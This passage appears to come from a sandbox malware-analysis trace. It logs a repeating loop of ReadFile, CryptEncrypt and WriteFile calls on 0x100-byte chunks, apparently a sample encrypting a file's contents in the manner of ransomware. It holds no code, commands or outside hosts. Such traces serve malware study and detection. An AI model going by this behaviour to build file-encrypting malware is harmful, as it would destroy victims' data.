lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.382] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.382] GetLastError () returned 0x0 [0149.382] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.382] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.382] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.382] GetLastError () returned 0x0 [0149.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.383] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.383] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.383] GetLastError () returned 0x0 [0149.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.383] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.383] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.383] GetLastError () returned 0x0 [0149.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.383] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.383] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.383] GetLastError () returned 0x0 [0149.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.383] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.383] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.383] GetLastError () returned 0x0 [0149.383] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.383] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.383] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.384] GetLastError () returned 0x0 [0149.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.384] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.384] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.384] GetLastError () returned 0x0 [0149.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.384] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.384] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.384] GetLastError () returned 0x0 [0149.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.384] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.384] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.384] GetLastError () returned 0x0 [0149.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.384] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.384] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.384] GetLastError () returned 0x0 [0149.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.384] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.384] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.384] GetLastError () returned 0x0 [0149.384] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.384] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.385] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.385] GetLastError () returned 0x0 [0149.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.385] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.385] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.385] GetLastError () returned 0x0 [0149.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.385] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.385] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.385] GetLastError () returned 0x0 [0149.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.385] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.385] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.385] GetLastError () returned 0x0 [0149.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.385] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.385] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.385] GetLastError () returned 0x0 [0149.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.385] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.385] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.385] GetLastError () returned 0x0 [0149.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.385] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.385] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.385] GetLastError () returned 0x0 [0149.385] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.386] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.386] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.386] GetLastError () returned 0x0 [0149.386] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.386] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.386] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.386] GetLastError () returned 0x0 [0149.386] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.386] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.386] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.386] GetLastError () returned 0x0 [0149.386] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.386] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.386] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.386] GetLastError () returned 0x0 [0149.386] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.386] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.386] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.386] GetLastError () returned 0x0 [0149.386] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.387] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.387] GetLastError () returned 0x0 [0149.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.387] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.387] GetLastError () returned 0x0 [0149.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.387] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.387] GetLastError () returned 0x0 [0149.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.387] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.387] GetLastError () returned 0x0 [0149.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.387] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.387] GetLastError () returned 0x0 [0149.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.387] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.387] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.387] GetLastError () returned 0x0 [0149.387] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.388] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.388] GetLastError () returned 0x0 [0149.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.388] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.388] GetLastError () returned 0x0 [0149.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.388] 